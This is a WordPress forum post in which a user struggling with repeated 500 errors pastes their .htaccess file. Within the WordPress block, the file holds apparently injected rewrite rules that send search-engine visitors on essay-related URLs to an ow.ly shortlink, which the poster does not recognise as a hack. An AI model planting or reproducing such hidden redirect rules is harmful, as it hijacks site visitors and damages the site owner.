500 Internal Server Error error
-
Below is the error.
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator at [email protected] to inform them of the time this error occurred, and the actions you performed just before this error.
More information about this error may be available in the server error log.
Additionally, a 500 Internal Server Error error was encountered while trying to use an ErrorDocument to handle the request.
After getting the above error I went out reading different blogs and tried the following.
renaming .htaccess file to .htaccess_old and then the sites get live and then moving to settings and in wp admin updated the permalinks.
Problem is:
When I do the above the sites give out the same error while updating permalinks so I delete the file and rename again.. the permalinks got updated but then again the same error. If i keep on changing and deleting the .htaccess the site appears but as soon as i click on any other tab the error appears again and i have to redo the same.
2ndly I have changed the permissions to 755 but it did not work either.
My ht.access code appears like this:
“# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} google|bing|aol|msn|yahoo|yandex|ya|rambler|mail|nigma|ask|lycos|teoma|talktalk|softonic|search|gmx [NC]
RewriteCond %{REQUEST_URI}%{QUERY_STRING} admission|-cv|algebra|analy|annotation|application|article|assignment|bibliography|biography|book|buy|case|cheap|citat|college|course|cover-letter|critical-thinking|custom|cv-|discussion|dissertation|document|edit|education|essay|example|help|history|home|homework|hystory|intro|lab|letter|liter|online|order|paragraph|page|paper|pay|personal|phd|poem|powerpoint|presentation|project|proofread|proposal|purchase|report|research|resume|review|school|service|speech|statement|stud|term|theses|thesis|thinking|topic|verificat|view|writ|curriculum|vitae|brief|format|outlinet [NC]
RewriteRule .* https://ow.ly/RxtzD [R,L]
RewriteBase /
RewriteRule ^index\.php$ – [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule># END WordPress”
What should I need to do???? please help.. everything was working fine and all this suddenly happened.. why is it happening automatically.i had deactivated all the plugins but still got the same problem. i have almost tried everything with no resolution….
- The topic ‘500 Internal Server Error error’ is closed to new replies.